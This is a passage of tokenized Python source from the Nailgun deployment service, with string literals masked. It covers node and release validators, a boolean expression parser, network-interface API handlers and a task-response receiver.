] for x in <EOL> db . query ( <EOL> Node . hostname ) . filter ( sa . and_ ( <EOL> Node . hostname . in_ ( hostnames ) , <EOL> Node . cluster_id == cluster_id , <EOL> ) <EOL> ) . all ( ) <EOL> ] <EOL> if conflicting_hostnames : <EOL> raise errors . AlreadyExists ( <EOL> "<STR_LIT>" <EOL> . format ( "<STR_LIT:U+002C>" . 
join ( conflicting_hostnames ) , cluster_id ) <EOL> ) <EOL> class NodeAssignmentValidator ( AssignmentValidator ) : <EOL> predicate = attrgetter ( '<STR_LIT>' ) <EOL> done_error_msg_template = "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" <EOL> @ classmethod <EOL> def validate_collection_update ( cls , data , cluster_id = None ) : <EOL> data = cls . validate_json ( data ) <EOL> cls . validate_schema ( data , assignment_format_schema ) <EOL> dict_data = dict ( ( d [ "<STR_LIT:id>" ] , d [ "<STR_LIT>" ] ) for d in data ) <EOL> received_node_ids = dict_data . keys ( ) <EOL> nodes = db . query ( Node ) . filter ( Node . id . in_ ( received_node_ids ) ) <EOL> cls . check_all_nodes ( nodes , received_node_ids ) <EOL> cls . check_if_already_done ( nodes ) <EOL> cluster = objects . Cluster . get_by_uid ( <EOL> cluster_id , fail_if_not_found = True <EOL> ) <EOL> cls . check_unique_hostnames ( nodes , cluster_id ) <EOL> for node_id in received_node_ids : <EOL> cls . validate_roles ( <EOL> cluster , <EOL> dict_data [ node_id ] <EOL> ) <EOL> return dict_data <EOL> @ classmethod <EOL> def validate_roles ( cls , cluster , roles ) : <EOL> available_roles = objects . Cluster . get_roles ( cluster ) <EOL> roles = set ( roles ) <EOL> not_valid_roles = roles - set ( available_roles ) <EOL> if not_valid_roles : <EOL> raise errors . InvalidData ( <EOL> u"<STR_LIT>" <EOL> . format ( u"<STR_LIT:U+002CU+0020>" . join ( not_valid_roles ) , cluster . id ) , <EOL> log_message = True <EOL> ) <EOL> cls . check_roles_for_conflicts ( roles , available_roles ) <EOL> cls . check_roles_requirement ( <EOL> roles , <EOL> available_roles , <EOL> { <EOL> '<STR_LIT>' : cluster . attributes . editable , <EOL> '<STR_LIT>' : cluster , <EOL> } ) <EOL> @ classmethod <EOL> def check_roles_for_conflicts ( cls , roles , roles_metadata ) : <EOL> all_roles = set ( roles_metadata . 
keys ( ) ) <EOL> for role in roles : <EOL> if "<STR_LIT>" in roles_metadata [ role ] : <EOL> other_roles = roles - set ( [ role ] ) <EOL> conflicting_roles = roles_metadata [ role ] [ "<STR_LIT>" ] <EOL> if conflicting_roles == "<STR_LIT:*>" : <EOL> conflicting_roles = all_roles - set ( [ role ] ) <EOL> else : <EOL> conflicting_roles = set ( conflicting_roles ) <EOL> conflicting_roles &= other_roles <EOL> if conflicting_roles : <EOL> raise errors . InvalidData ( <EOL> u'<STR_LIT>' <EOL> . format ( role , "<STR_LIT:U+002CU+0020>" . join ( conflicting_roles ) ) , <EOL> log_message = True <EOL> ) <EOL> @ classmethod <EOL> def check_roles_requirement ( cls , roles , roles_metadata , models ) : <EOL> for role in roles : <EOL> if "<STR_LIT>" in roles_metadata [ role ] : <EOL> depends = roles_metadata [ role ] [ '<STR_LIT>' ] <EOL> for condition in depends : <EOL> expression = condition [ '<STR_LIT>' ] <EOL> if not Expression ( expression , models ) . evaluate ( ) : <EOL> raise errors . InvalidData ( condition [ '<STR_LIT>' ] ) <EOL> class NodeUnassignmentValidator ( AssignmentValidator ) : <EOL> done_error_msg_template = "<STR_LIT>" "<STR_LIT>" <EOL> @ staticmethod <EOL> def predicate ( node ) : <EOL> return not node . cluster or node . pending_deletion <EOL> @ classmethod <EOL> def validate_collection_update ( cls , data , cluster_id = None ) : <EOL> list_data = cls . validate_json ( data ) <EOL> cls . validate_schema ( list_data , unassignment_format_schema ) <EOL> node_ids_set = set ( n [ '<STR_LIT:id>' ] for n in list_data ) <EOL> nodes = db . query ( Node ) . filter ( Node . id . in_ ( node_ids_set ) ) <EOL> node_id_cluster_map = dict ( <EOL> ( n . id , n . cluster_id ) for n in <EOL> db . query ( Node . id , Node . cluster_id ) . filter ( <EOL> Node . id . in_ ( node_ids_set ) ) ) <EOL> other_cluster_ids_set = set ( node_id_cluster_map . values ( ) ) - set ( ( int ( cluster_id ) , ) ) <EOL> if other_cluster_ids_set : <EOL> raise errors . 
InvalidData ( <EOL> u"<STR_LIT>" <EOL> . format ( <EOL> u"<STR_LIT:U+002CU+0020>" . join ( <EOL> str ( n_id ) for n_id , c_id in <EOL> node_id_cluster_map . iteritems ( ) <EOL> if c_id in other_cluster_ids_set <EOL> ) , cluster_id ) , log_message = True <EOL> ) <EOL> cls . check_all_nodes ( nodes , node_ids_set ) <EOL> cls . check_if_already_done ( nodes ) <EOL> return nodes </s>
<s> import sqlalchemy as sa <EOL> from sqlalchemy . dialects import postgresql as psql <EOL> from nailgun . api . v1 . validators . base import BasicValidator <EOL> from nailgun . api . v1 . validators . json_schema import release <EOL> from nailgun import consts <EOL> from nailgun . db import db <EOL> from nailgun . db . sqlalchemy import models <EOL> from nailgun import errors <EOL> class ReleaseValidator ( BasicValidator ) : <EOL> @ classmethod <EOL> def _validate_common ( cls , d ) : <EOL> if "<STR_LIT>" in d : <EOL> meta = d [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> for network in meta [ "<STR_LIT>" ] : <EOL> if "<STR_LIT:name>" not in network : <EOL> raise errors . InvalidData ( <EOL> "<STR_LIT>" . format ( network ) , <EOL> log_message = True <EOL> ) <EOL> @ classmethod <EOL> def validate ( cls , data ) : <EOL> d = cls . validate_json ( data ) <EOL> if "<STR_LIT:name>" not in d : <EOL> raise errors . InvalidData ( <EOL> "<STR_LIT>" , <EOL> log_message = True <EOL> ) <EOL> if "<STR_LIT:version>" not in d : <EOL> raise errors . InvalidData ( <EOL> "<STR_LIT>" , <EOL> log_message = True <EOL> ) <EOL> if "<STR_LIT>" not in d : <EOL> raise errors . InvalidData ( <EOL> "<STR_LIT>" , <EOL> log_message = True <EOL> ) <EOL> if db ( ) . query ( models . Release ) . filter_by ( <EOL> name = d [ "<STR_LIT:name>" ] , <EOL> version = d [ "<STR_LIT:version>" ] <EOL> ) . first ( ) : <EOL> raise errors . AlreadyExists ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> log_message = True <EOL> ) <EOL> cls . _validate_common ( d ) <EOL> if "<STR_LIT>" not in d : <EOL> d [ "<STR_LIT>" ] = { } <EOL> if "<STR_LIT>" not in d : <EOL> d [ "<STR_LIT>" ] = { } <EOL> return d <EOL> @ classmethod <EOL> def validate_update ( cls , data , instance ) : <EOL> d = cls . validate_json ( data ) <EOL> cls . _validate_common ( d ) <EOL> if db ( ) . query ( models . Release ) . filter_by ( <EOL> name = d . get ( "<STR_LIT:name>" , instance . name ) , <EOL> version = d . 
get ( "<STR_LIT:version>" , instance . version ) <EOL> ) . filter ( <EOL> sa . not_ ( models . Release . id == instance . id ) <EOL> ) . first ( ) : <EOL> raise errors . AlreadyExists ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> log_message = True <EOL> ) <EOL> if '<STR_LIT>' in d : <EOL> new_roles = set ( d [ '<STR_LIT>' ] ) <EOL> clusters = [ cluster . id for cluster in instance . clusters ] <EOL> new_roles_array = sa . cast ( <EOL> psql . array ( new_roles ) , <EOL> psql . ARRAY ( sa . String ( consts . ROLE_NAME_MAX_SIZE ) ) ) <EOL> node = db ( ) . query ( models . Node ) . filter ( <EOL> models . Node . cluster_id . in_ ( clusters ) <EOL> ) . filter ( sa . not_ ( sa . and_ ( <EOL> models . Node . roles . contained_by ( new_roles_array ) , <EOL> models . Node . pending_roles . contained_by ( new_roles_array ) <EOL> ) ) ) . first ( ) <EOL> if node : <EOL> used_role = set ( node . roles + node . pending_roles ) <EOL> used_role -= new_roles <EOL> raise errors . CannotDelete ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( '<STR_LIT:U+002C>' . join ( used_role ) ) <EOL> ) <EOL> return d <EOL> @ classmethod <EOL> def validate_delete ( cls , data , instance ) : <EOL> if instance . clusters : <EOL> raise errors . CannotDelete ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class ReleaseNetworksValidator ( BasicValidator ) : <EOL> @ classmethod <EOL> def validate ( cls , data ) : <EOL> parsed = super ( ReleaseNetworksValidator , cls ) . validate ( data ) <EOL> cls . validate_schema ( parsed ) <EOL> return parsed <EOL> @ classmethod <EOL> def validate_schema ( cls , data ) : <EOL> return super ( ReleaseNetworksValidator , cls ) . validate_schema ( <EOL> data , release . NETWORKS_SCHEMA ) </s>
<s> from sqlalchemy import Column <EOL> from sqlalchemy . dialects . postgresql import JSON <EOL> from sqlalchemy import Integer <EOL> from sqlalchemy import String <EOL> from nailgun . db . sqlalchemy . models . base import Base <EOL> from nailgun . db . sqlalchemy . models . mutable import MutableDict <EOL> class MasterNodeSettings ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> master_node_uid = Column ( String ( <NUM_LIT> ) , nullable = False ) <EOL> settings = Column ( MutableDict . as_mutable ( JSON ) , nullable = False , default = { } , <EOL> server_default = '<STR_LIT:{}>' ) </s>
<s> import ply . lex <EOL> import ply . yacc <EOL> from nailgun import errors <EOL> from nailgun . expression . objects import ModelPathWrapper <EOL> from nailgun . expression . objects import ScalarWrapper <EOL> from nailgun . expression . objects import SubexpressionWrapper <EOL> tokens = ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> def t_NUMBER ( t ) : <EOL> r'<STR_LIT>' <EOL> t . value = int ( t . value ) <EOL> return t <EOL> def t_STRING ( t ) : <EOL> r'<STR_LIT>' <EOL> t . value = t . value [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> return t <EOL> def t_TRUE ( t ) : <EOL> r'<STR_LIT:true>' <EOL> t . value = True <EOL> return t <EOL> def t_FALSE ( t ) : <EOL> r'<STR_LIT:false>' <EOL> t . value = False <EOL> return t <EOL> def t_NULL ( t ) : <EOL> r'<STR_LIT:null>' <EOL> t . value = None <EOL> return t <EOL> t_AND = r'<STR_LIT>' <EOL> t_OR = r'<STR_LIT>' <EOL> t_NOT = r'<STR_LIT>' <EOL> t_IN = r'<STR_LIT>' <EOL> t_MODELPATH = r'<STR_LIT>' <EOL> t_EQUALS = r'<STR_LIT>' <EOL> t_NOT_EQUALS = r'<STR_LIT>' <EOL> t_LPAREN = r'<STR_LIT>' <EOL> t_RPAREN = r'<STR_LIT>' <EOL> t_ignore = '<STR_LIT>' <EOL> def t_error ( t ) : <EOL> errors . LexError ( "<STR_LIT>" % t . value [ <NUM_LIT:0> ] ) <EOL> t . lexer . 
skip ( <NUM_LIT:1> ) <EOL> expression = None <EOL> precedence = ( <EOL> ( '<STR_LIT:left>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:left>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:left>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:left>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) <EOL> def p_expression_binop ( p ) : <EOL> """<STR_LIT>""" <EOL> result , arg1 , op , arg2 = p <EOL> if op == '<STR_LIT>' : <EOL> result = lambda : arg1 ( ) == arg2 ( ) <EOL> elif op == '<STR_LIT>' : <EOL> result = lambda : arg1 ( ) != arg2 ( ) <EOL> elif op == '<STR_LIT>' : <EOL> result = lambda : arg1 ( ) or arg2 ( ) <EOL> elif op == '<STR_LIT>' : <EOL> result = lambda : arg1 ( ) and arg2 ( ) <EOL> elif op == '<STR_LIT>' : <EOL> result = lambda : arg1 ( ) in arg2 ( ) <EOL> p [ <NUM_LIT:0> ] = SubexpressionWrapper ( result ) <EOL> def p_not_expression ( p ) : <EOL> """<STR_LIT>""" <EOL> subexpression = p [ <NUM_LIT:2> ] <EOL> p [ <NUM_LIT:0> ] = SubexpressionWrapper ( lambda : not subexpression ( ) ) <EOL> def p_expression_group ( p ) : <EOL> """<STR_LIT>""" <EOL> p [ <NUM_LIT:0> ] = p [ <NUM_LIT:2> ] <EOL> def p_expression_scalar ( p ) : <EOL> """<STR_LIT>""" <EOL> p [ <NUM_LIT:0> ] = ScalarWrapper ( p [ <NUM_LIT:1> ] ) <EOL> def p_expression_modelpath ( p ) : <EOL> """<STR_LIT>""" <EOL> p [ <NUM_LIT:0> ] = ModelPathWrapper ( p [ <NUM_LIT:1> ] , expression ) <EOL> def p_error ( p ) : <EOL> raise errors . ParseError ( "<STR_LIT>" % getattr ( p , '<STR_LIT:value>' , '<STR_LIT>' ) ) <EOL> lexer = ply . lex . lex ( ) <EOL> parser = ply . yacc . yacc ( debug = False , write_tables = False ) <EOL> def parse ( expr ) : <EOL> global expression <EOL> expression = expr <EOL> return parser . parse ( expression . expression_text , lexer = lexer ) </s>
<s> """<STR_LIT>""" <EOL> import web <EOL> from nailgun . api . v1 . handlers . base import BaseHandler <EOL> from nailgun . api . v1 . handlers . base import content <EOL> from nailgun . extensions . network_manager . validators . network import NetAssignmentValidator <EOL> from nailgun import consts <EOL> from nailgun import objects <EOL> from nailgun . extensions . network_manager . objects . serializers . nic import NodeInterfacesSerializer <EOL> from nailgun . db . sqlalchemy . models import NetworkGroup <EOL> from nailgun . db . sqlalchemy . models import NodeNICInterface <EOL> class NodeNICsHandler ( BaseHandler ) : <EOL> """<STR_LIT>""" <EOL> model = NodeNICInterface <EOL> validator = NetAssignmentValidator <EOL> serializer = NodeInterfacesSerializer <EOL> @ content <EOL> def GET ( self , node_id ) : <EOL> """<STR_LIT>""" <EOL> node = self . get_object_or_404 ( objects . Node , node_id ) <EOL> return map ( self . render , node . interfaces ) <EOL> @ content <EOL> def PUT ( self , node_id ) : <EOL> """<STR_LIT>""" <EOL> interfaces_data = self . checked_data ( <EOL> self . validator . validate_structure_and_data , node_id = node_id ) <EOL> node_data = { '<STR_LIT:id>' : node_id , '<STR_LIT>' : interfaces_data } <EOL> objects . Cluster . get_network_manager ( ) . _update_attrs ( node_data ) <EOL> node = self . get_object_or_404 ( objects . Node , node_id ) <EOL> objects . Node . add_pending_change ( <EOL> node , <EOL> consts . CLUSTER_CHANGES . interfaces <EOL> ) <EOL> return map ( self . render , node . interfaces ) <EOL> class NodeCollectionNICsHandler ( BaseHandler ) : <EOL> """<STR_LIT>""" <EOL> model = NetworkGroup <EOL> validator = NetAssignmentValidator <EOL> serializer = NodeInterfacesSerializer <EOL> @ content <EOL> def PUT ( self ) : <EOL> """<STR_LIT>""" <EOL> data = self . checked_data ( <EOL> self . validator . validate_collection_structure_and_data ) <EOL> updated_nodes_ids = [ ] <EOL> for node_data in data : <EOL> node_id = objects . Cluster . 
get_network_manager ( ) . _update_attrs ( <EOL> node_data ) <EOL> updated_nodes_ids . append ( node_id ) <EOL> updated_nodes = objects . NodeCollection . filter_by_id_list ( <EOL> None , updated_nodes_ids <EOL> ) . all ( ) <EOL> return [ <EOL> { <EOL> "<STR_LIT:id>" : n . id , <EOL> "<STR_LIT>" : map ( self . render , n . interfaces ) <EOL> } for n in updated_nodes <EOL> ] <EOL> class NodeNICsDefaultHandler ( BaseHandler ) : <EOL> """<STR_LIT>""" <EOL> @ content <EOL> def GET ( self , node_id ) : <EOL> """<STR_LIT>""" <EOL> node = self . get_object_or_404 ( objects . Node , node_id ) <EOL> return self . get_default ( node ) <EOL> def get_default ( self , node ) : <EOL> if node . cluster : <EOL> return objects . Cluster . get_network_manager ( <EOL> node . cluster <EOL> ) . get_default_interfaces_configuration ( node ) <EOL> class NodeCollectionNICsDefaultHandler ( NodeNICsDefaultHandler ) : <EOL> """<STR_LIT>""" <EOL> validator = NetAssignmentValidator <EOL> @ content <EOL> def GET ( self ) : <EOL> """<STR_LIT>""" <EOL> cluster_id = web . input ( cluster_id = None ) . cluster_id <EOL> if cluster_id : <EOL> nodes = objects . NodeCollection . filter_by ( None , cluster_id = cluster_id ) <EOL> else : <EOL> nodes = objects . NodeCollection . all ( ) <EOL> return filter ( lambda x : x is not None , map ( self . get_default , nodes ) ) </s>
<s> class NailgunNodeAdapter ( object ) : <EOL> def __init__ ( self , node ) : <EOL> self . node = node <EOL> @ property <EOL> def id ( self ) : <EOL> return self . node . id <EOL> @ property <EOL> def name ( self ) : <EOL> return self . node . name <EOL> @ property <EOL> def full_name ( self ) : <EOL> return self . node . full_name <EOL> def get_node_spaces ( self ) : <EOL> from . . manager import get_node_spaces <EOL> if self . node . cluster : <EOL> return get_node_spaces ( self . node ) <EOL> return [ ] <EOL> @ property <EOL> def disks ( self ) : <EOL> return self . node . meta [ '<STR_LIT>' ] <EOL> @ property <EOL> def ram ( self ) : <EOL> return self . node . meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> @ property <EOL> def is_ubuntu ( self ) : <EOL> """<STR_LIT>""" <EOL> return ( self . node . cluster and <EOL> self . node . cluster . release . operating_system . lower ( ) == "<STR_LIT>" ) </s>
<s> from nailgun . db import db <EOL> from nailgun . db . sqlalchemy import models <EOL> from nailgun . objects import NailgunCollection <EOL> from nailgun . objects import NailgunObject <EOL> from nailgun . objects . serializers . action_log import ActionLogSerializer <EOL> class ActionLog ( NailgunObject ) : <EOL> model = models . ActionLog <EOL> serializer = ActionLogSerializer <EOL> @ classmethod <EOL> def update ( cls , instance , data ) : <EOL> """<STR_LIT>""" <EOL> instance . additional_info . update ( data . pop ( '<STR_LIT>' , { } ) ) <EOL> return super ( ActionLog , cls ) . update ( instance , data ) <EOL> @ classmethod <EOL> def get_by_kwargs ( cls , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> instance = db ( ) . query ( models . ActionLog ) . filter_by ( ** kwargs ) . first ( ) <EOL> return instance <EOL> class ActionLogCollection ( NailgunCollection ) : <EOL> single = ActionLog </s>
<s> from nailgun . objects . serializers . base import BasicSerializer <EOL> class PluginLinkSerializer ( BasicSerializer ) : <EOL> fields = ( <EOL> "<STR_LIT:id>" , <EOL> "<STR_LIT:title>" , <EOL> "<STR_LIT:url>" , <EOL> "<STR_LIT:description>" , <EOL> "<STR_LIT>" <EOL> ) </s>
<s> import collections <EOL> import copy <EOL> import datetime <EOL> import itertools <EOL> import logging <EOL> import os <EOL> import six <EOL> from oslo_serialization import jsonutils <EOL> from sqlalchemy import or_ <EOL> from nailgun import consts <EOL> from nailgun import errors as nailgun_errors <EOL> from nailgun import notifier <EOL> from nailgun import objects <EOL> from nailgun . settings import settings <EOL> from nailgun . consts import TASK_STATUSES <EOL> from nailgun . db import db <EOL> from nailgun . db . sqlalchemy . models import IPAddr <EOL> from nailgun . db . sqlalchemy . models import Node <EOL> from nailgun . db . sqlalchemy . models import Release <EOL> from nailgun . extensions . network_manager import connectivity_check <EOL> from nailgun . extensions . network_manager import utils as net_utils <EOL> from nailgun . objects . plugin import ClusterPlugins <EOL> from nailgun . task . helpers import TaskHelper <EOL> from nailgun . utils import logs as logs_utils <EOL> from nailgun . utils import reverse <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> class NailgunReceiver ( object ) : <EOL> @ classmethod <EOL> def remove_nodes_resp ( cls , ** kwargs ) : <EOL> logger . info ( <EOL> "<STR_LIT>" % <EOL> jsonutils . dumps ( kwargs ) <EOL> ) <EOL> task_uuid = kwargs . get ( '<STR_LIT>' ) <EOL> nodes = kwargs . get ( '<STR_LIT>' ) or [ ] <EOL> error_nodes = kwargs . get ( '<STR_LIT>' ) or [ ] <EOL> inaccessible_nodes = kwargs . get ( '<STR_LIT>' ) or [ ] <EOL> error_msg = kwargs . get ( '<STR_LIT:error>' ) <EOL> status = kwargs . get ( '<STR_LIT:status>' ) <EOL> progress = kwargs . get ( '<STR_LIT>' ) <EOL> if status in [ consts . TASK_STATUSES . ready , consts . TASK_STATUSES . error ] : <EOL> progress = <NUM_LIT:100> <EOL> task = objects . Task . get_by_uuid ( <EOL> task_uuid , <EOL> fail_if_not_found = True , <EOL> lock_for_update = True <EOL> ) <EOL> if task . cluster_id is not None : <EOL> objects . Cluster . get_by_uid ( <EOL> task . 
cluster_id , <EOL> fail_if_not_found = True , <EOL> lock_for_update = True <EOL> ) <EOL> all_nodes = itertools . chain ( nodes , error_nodes , inaccessible_nodes ) <EOL> all_nodes_ids = [ <EOL> node [ '<STR_LIT:id>' ] if '<STR_LIT:id>' in node else node [ '<STR_LIT>' ] <EOL> for node in all_nodes <EOL> ] <EOL> locked_nodes = objects . NodeCollection . order_by ( <EOL> objects . NodeCollection . filter_by_list ( <EOL> None , <EOL> '<STR_LIT:id>' , <EOL> all_nodes_ids , <EOL> ) , <EOL> '<STR_LIT:id>' <EOL> ) <EOL> objects . NodeCollection . lock_for_update ( locked_nodes ) . all ( ) <EOL> def get_node_id ( n ) : <EOL> return n . get ( '<STR_LIT:id>' , int ( n . get ( '<STR_LIT>' ) ) ) <EOL> nodes_to_delete_ids = [ get_node_id ( n ) for n in nodes ] <EOL> if len ( inaccessible_nodes ) > <NUM_LIT:0> : <EOL> inaccessible_node_ids = [ <EOL> get_node_id ( n ) for n in inaccessible_nodes ] <EOL> logger . warn ( u'<STR_LIT>' , <EOL> inaccessible_nodes ) <EOL> nodes_to_delete_ids . extend ( inaccessible_node_ids ) <EOL> for node in objects . NodeCollection . filter_by_id_list ( <EOL> None , nodes_to_delete_ids ) : <EOL> logs_utils . delete_node_logs ( node ) <EOL> objects . NodeCollection . delete_by_ids ( nodes_to_delete_ids ) <EOL> for node in error_nodes : <EOL> node_db = objects . Node . get_by_uid ( node [ '<STR_LIT>' ] ) <EOL> if not node_db : <EOL> logger . error ( <EOL> u"<STR_LIT>" <EOL> "<STR_LIT>" , str ( node ) <EOL> ) <EOL> else : <EOL> node_db . pending_deletion = False <EOL> node_db . status = '<STR_LIT:error>' <EOL> db ( ) . add ( node_db ) <EOL> node [ '<STR_LIT:name>' ] = node_db . name <EOL> db ( ) . flush ( ) <EOL> success_msg = u"<STR_LIT>" <EOL> err_msg = u"<STR_LIT>" <EOL> if nodes : <EOL> success_msg = u"<STR_LIT>" . format ( <EOL> len ( nodes ) <EOL> ) <EOL> notifier . notify ( "<STR_LIT>" , success_msg ) <EOL> if error_nodes : <EOL> err_msg = u"<STR_LIT>" . format ( <EOL> len ( error_nodes ) , <EOL> '<STR_LIT:U+002CU+0020>' . join ( <EOL> [ n . 
get ( '<STR_LIT:name>' ) or "<STR_LIT>" . format ( n [ '<STR_LIT>' ] ) <EOL> for n in error_nodes ] ) <EOL> ) <EOL> notifier . notify ( "<STR_LIT:error>" , err_msg ) <EOL> if not error_msg : <EOL> error_msg = "<STR_LIT>" . join ( [ success_msg , err_msg ] ) <EOL> data = { <EOL> '<STR_LIT:status>' : status , <EOL> '<STR_LIT>' : progress , <EOL> '<STR_LIT:message>' : error_msg , <EOL> } <EOL> objects . Task . update ( task , data ) <EOL> cls . _update_action_log_entry ( status , task . name , task_uuid , nodes ) <EOL> @ classmethod <EOL> def remove_cluster_resp ( cls , ** kwargs ) : <EOL> logger . info ( <EOL> "<STR_LIT>" % <EOL> jsonutils . dumps ( kwargs ) <EOL> ) <EOL> task_uuid = kwargs . get ( '<STR_LIT>' ) <EOL> cls . remove_nodes_resp ( ** kwargs ) <EOL> task = objects . Task . get_by_uuid ( task_uuid , fail_if_not_found = True ) <EOL> cluster = task . cluster <EOL> if task . status in ( '<STR_LIT>' , ) : <EOL> logger . debug ( "<STR_LIT>" ) <EOL> cluster_name = cluster . name <EOL> ips = db ( ) . query ( IPAddr ) . filter ( <EOL> IPAddr . network . in_ ( [ n . id for n in cluster . network_groups ] ) <EOL> ) <EOL> for ip in ips : <EOL> db ( ) . delete ( ip ) <EOL> db ( ) . flush ( ) <EOL> nm = objects . Cluster . get_network_manager ( cluster ) <EOL> admin_nets = nm . get_admin_networks ( ) <EOL> objects . Task . delete ( task ) <EOL> for task_ in cluster . tasks : <EOL> if task_ != task : <EOL> objects . Transaction . delete ( task_ ) <EOL> objects . Cluster . delete ( cluster ) <EOL> if admin_nets != nm . get_admin_networks ( ) : <EOL> from nailgun . task . manager import UpdateDnsmasqTaskManager <EOL> UpdateDnsmasqTaskManager ( ) . execute ( ) <EOL> notifier . notify ( <EOL> "<STR_LIT>" , <EOL> u"<STR_LIT>" % ( <EOL> cluster_name <EOL> ) <EOL> ) <EOL> elif task . status in ( '<STR_LIT:error>' , ) : <EOL> cluster . status = '<STR_LIT:error>' <EOL> db ( ) . add ( cluster ) <EOL> db ( ) . flush ( ) <EOL> if not task . message : <EOL> task . 
message = "<STR_LIT>" . format ( <EOL> cls . _generate_error_message ( <EOL> task , <EOL> error_types = ( '<STR_LIT>' , ) <EOL> ) <EOL> ) <EOL> notifier . notify ( <EOL> "<STR_LIT:error>" , <EOL> task . message , <EOL> cluster . id <EOL> ) <EOL> @ classmethod <EOL> def remove_images_resp ( cls , ** kwargs ) : <EOL> logger . info ( <EOL> "<STR_LIT>" , <EOL> jsonutils . dumps ( kwargs ) <EOL> ) <EOL> status = kwargs . get ( '<STR_LIT:status>' ) <EOL> task_uuid = kwargs [ '<STR_LIT>' ] <EOL> task = objects . Task . get_by_uuid ( task_uuid ) <EOL> if status == consts . TASK_STATUSES . ready : <EOL> logger . info ( "<STR_LIT>" ) <EOL> elif status == consts . TASK_STATUSES . error : <EOL> logger . error ( "<STR_LIT>" , task_uuid ) <EOL> objects . Task . update ( task , { '<STR_LIT:status>' : status } ) <EOL> @ classmethod <EOL> def deploy_resp ( cls , ** kwargs ) : <EOL> logger . info ( <EOL> "<STR_LIT>" % <EOL> jsonutils . dumps ( kwargs ) <EOL> ) <EOL> task_uuid = kwargs . get ( '<STR_LIT>' ) <EOL> nodes = kwargs . get ( '<STR_LIT>' ) or [ ] <EOL> message = kwargs . get ( '<STR_LIT:error>' ) <EOL> status = kwargs . get ( '<STR_LIT:status>' ) <EOL> progress = kwargs . get ( '<STR_LIT>' ) <EOL> task = objects . Task . get_by_uuid ( <EOL> task_uuid , <EOL> fail_if_not_found = True <EOL> ) <EOL> objects . Cluster . get_by_uid ( <EOL> task . cluster_id , <EOL> fail_if_not_found = True , <EOL> lock_for_update = True <EOL> ) <EOL> if not status : <EOL> status = task . status <EOL> nodes_by_id = { str ( n [ '<STR_LIT>' ] ) : n for n in nodes } <EOL> master = nodes_by_id . pop ( consts . MASTER_NODE_UID , { } ) <EOL> nodes_by_id . pop ( '<STR_LIT:None>' , { } ) <EOL> if nodes_by_id : <EOL> q_nodes = objects . NodeCollection . filter_by_id_list ( <EOL> None , <EOL> nodes_by_id , <EOL> ) <EOL> q_nodes = objects . NodeCollection . order_by ( q_nodes , '<STR_LIT:id>' ) <EOL> db_nodes = objects . NodeCollection . lock_for_update ( q_nodes ) . 
all ( ) <EOL> else : <EOL> db_nodes = [ ] <EOL> for node_db in db_nodes : <EOL> node = nodes_by_id . pop ( node_db . uid ) <EOL> update_fields = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:status>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> for param in update_fields : <EOL> if param in node : <EOL> logger . debug ( "<STR_LIT>" , <EOL> node [ '<STR_LIT>' ] , param , node [ param ] ) <EOL> setattr ( node_db , param , node [ param ] ) <EOL> if param == '<STR_LIT>' and node . get ( '<STR_LIT:status>' ) == '<STR_LIT:error>' or node . get ( '<STR_LIT>' ) is False : <EOL> node_db . progress = <NUM_LIT:100> <EOL> if node . get ( '<STR_LIT>' ) is False and not node_db . error_msg : <EOL> node_db . error_msg = u"<STR_LIT>" <EOL> notifier . notify ( <EOL> consts . NOTIFICATION_TOPICS . error , <EOL> u"<STR_LIT>" . format ( <EOL> consts . TASK_NAMES . deploy , <EOL> node_db . name , <EOL> node_db . error_msg or "<STR_LIT>" <EOL> ) , <EOL> cluster_id = task . cluster_id , <EOL> node_id = node [ '<STR_LIT>' ] , <EOL> task_uuid = task_uuid <EOL> ) <EOL> if nodes_by_id : <EOL> logger . warning ( "<STR_LIT>" , <EOL> "<STR_LIT:U+002C>" . join ( sorted ( nodes_by_id ) ) ) <EOL> for node in nodes : <EOL> if node . get ( '<STR_LIT>' ) and node . get ( '<STR_LIT>' ) : <EOL> objects . DeploymentHistory . update_if_exist ( <EOL> task . id , <EOL> node [ '<STR_LIT>' ] , <EOL> node [ '<STR_LIT>' ] , <EOL> node [ '<STR_LIT>' ] , <EOL> node . get ( '<STR_LIT>' ) <EOL> ) <EOL> db ( ) . flush ( ) <EOL> if nodes and not progress : <EOL> progress = TaskHelper . recalculate_deployment_task_progress ( task ) <EOL> if master . get ( '<STR_LIT:status>' ) == consts . TASK_STATUSES . error : <EOL> status = consts . TASK_STATUSES . error <EOL> cls . _update_task_status ( task , status , progress , message , db_nodes ) <EOL> cls . _update_action_log_entry ( status , task . 
